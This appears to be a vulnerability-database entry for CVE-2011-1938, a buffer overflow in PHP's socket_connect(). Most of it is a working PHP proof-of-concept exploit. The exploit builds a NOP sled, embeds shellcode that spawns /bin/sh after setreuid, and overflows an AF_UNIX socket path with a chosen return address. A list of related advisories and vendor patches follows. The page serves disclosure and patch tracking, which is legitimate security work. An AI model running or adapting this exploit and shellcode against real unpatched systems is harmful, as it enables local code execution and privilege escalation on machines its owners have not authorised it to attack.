Lucene search
RootSSV:71717HistoryJul 01, 2014 - 12:00 a.m.
PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability
2014-07-0100:00:00
Root
www.seebug.org
44
0.019 Low
EPSS
Percentile
87.0%
No description provided by source.
<?php
// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian
// Affected Versions: 5.3.3-5.3.6
echo "[+] CVE-2011-1938";
echo "[+] there we go...\n";
define('EVIL_SPACE_ADDR', "\xff\xff\xee\xb3");
define('EVIL_SPACE_SIZE', 1024*1024*8);
$SHELLCODE =
"\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0".
"\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1".
"\xcd\x80";
echo "[+] creating the sled.\n";
$CODE = str_repeat("\x90", EVIL_SPACE_SIZE);
for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ;
$i < strlen($SHELLCODE) ; $i++, $j++) {
$CODE[$j] = $SHELLCODE[$i];
}
$b = str_repeat("A", 196).EVIL_SPACE_ADDR;
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);
echo "[+] popping shell, have fun (if you picked the right address...)\n";
$var85 = socket_connect($var79,$b);
?>
Related
prion
prion
Stack overflow
2011-05-31 20:55:00
cve
cve
CVE-2011-1938
2011-05-31 20:55:00
openvas
openvas
PHP 'socket_connect()' Buffer Overflow Vulnerability - Windows
2011-06-02 00:00:00
FreeBSD Ports: php5, php5-sockets
2011-09-21 00:00:00
Slackware: Security Advisory (SSA:2011-237-01)
2012-09-10 00:00:00
seebug
seebug
PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability
2011-05-26 00:00:00
PHP 5.3.6 - Buffer Overflow PoC (ROP)
2014-07-01 00:00:00
PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938
2011-07-05 00:00:00
ubuntucve
ubuntucve
CVE-2011-1938
2011-05-31 00:00:00
packetstorm
packetstorm
PHP Socket connect() Stack Buffer Overflow
2011-05-25 00:00:00
PHP 5.3.6 Buffer Overflow
2011-07-03 00:00:00
veracode
veracode
Denial Of Service (DoS)
2020-04-10 01:03:26
exploitpack
exploitpack
PHP 5.3.5 - socket_connect() Local Buffer Overflow
2011-05-25 00:00:00
PHP 5.3.6 - Local Buffer Overflow (ROP)
2011-07-04 00:00:00
exploitdb
exploitdb
PHP 5.3.6 - Local Buffer Overflow (ROP)
2011-07-04 00:00:00
PHP 5.3.5 - 'socket_connect()' Local Buffer Overflow
2011-05-25 00:00:00
freebsd
freebsd
php -- multiple vulnerabilities
2011-08-18 00:00:00
nessus
nessus
PHP 5.3 < 5.3.7 Multiple Vulnerabilities
2011-08-23 00:00:00
PHP 5.3.x < 5.3.7 Multiple Vulnerabilities
2011-08-23 00:00:00
securityvulns
securityvulns
[slackware-security] php (SSA:2011-237-01)
2011-08-27 00:00:00
PHP multiple security vulnerabilities
2011-08-27 00:00:00
[ MDVSA-2012:071 ] php
2012-05-14 00:00:00
slackware
slackware
[slackware-security] php
2011-08-25 16:35:35
fedora
fedora
[SECURITY] Fedora 15 Update: maniadrive-1.2-32.fc15
2011-09-18 23:00:38
[SECURITY] Fedora 16 Update: php-5.3.8-1.fc16
2011-09-09 17:13:35
[SECURITY] Fedora 14 Update: php-5.3.8-1.fc14
2011-09-18 22:59:22
osv
osv
php5 - several
2012-01-31 00:00:00
debian
debian
[SECURITY] [DSA 2399-2] php5 regression fix
2012-01-31 15:26:47
[SECURITY] [DSA 2399-1] php5 security update
2012-01-31 07:22:58
amazon
amazon
Important: php
2011-10-11 00:07:00
f5
f5
K15903 : Multiple PHP vulnerabilities
2014-12-11 00:00:00
SOL15903 - Multiple PHP vulnerabilities
2014-12-11 00:00:00
ubuntu
ubuntu
PHP Vulnerabilities
2011-10-18 00:00:00
redhat
redhat
(RHSA-2011:1423) Moderate: php53 and php security update
2011-11-02 00:00:00
centos
centos
php53 security update
2011-11-03 03:59:22
oraclelinux
oraclelinux
php53 and php security update
2011-11-02 00:00:00
php security update
2012-06-29 00:00:00
gentoo
gentoo
PHP: Multiple vulnerabilities
2011-10-10 00:00:00